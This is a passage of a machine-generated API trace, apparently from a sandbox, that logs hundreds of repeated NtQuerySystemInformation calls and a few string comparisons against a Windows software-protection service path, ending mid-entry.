[0283.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x28, ResultLength=0x0) [0283.281] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf10, Length=0x28, ResultLength=0x0) [0283.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0283.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x28, ResultLength=0x0) [0283.292] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d140, Length=0x50, ResultLength=0x0) [0283.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x28, ResultLength=0x0) [0283.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf10, Length=0x28, ResultLength=0x0) [0283.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0283.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf90, Length=0x28, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x20, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d070, Length=0x38, ResultLength=0x0) [0283.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x20, ResultLength=0x0) [0283.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0283.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce80, Length=0x20, ResultLength=0x0) [0283.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x50, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x50, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x50, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x50, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x50, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x50, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x50, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x38, ResultLength=0x0) [0283.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x28, ResultLength=0x0) [0283.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x28, ResultLength=0x0) [0283.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x28, ResultLength=0x0) [0283.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x28, ResultLength=0x0) [0283.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0283.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x38, ResultLength=0x0) [0283.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0283.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0283.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0283.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0283.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0283.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0283.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x38, ResultLength=0x0) [0283.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x38, ResultLength=0x0) [0283.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0283.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0283.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0283.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0283.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0283.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0283.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0283.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0283.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0283.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0283.324] NtQuerySystemInformation 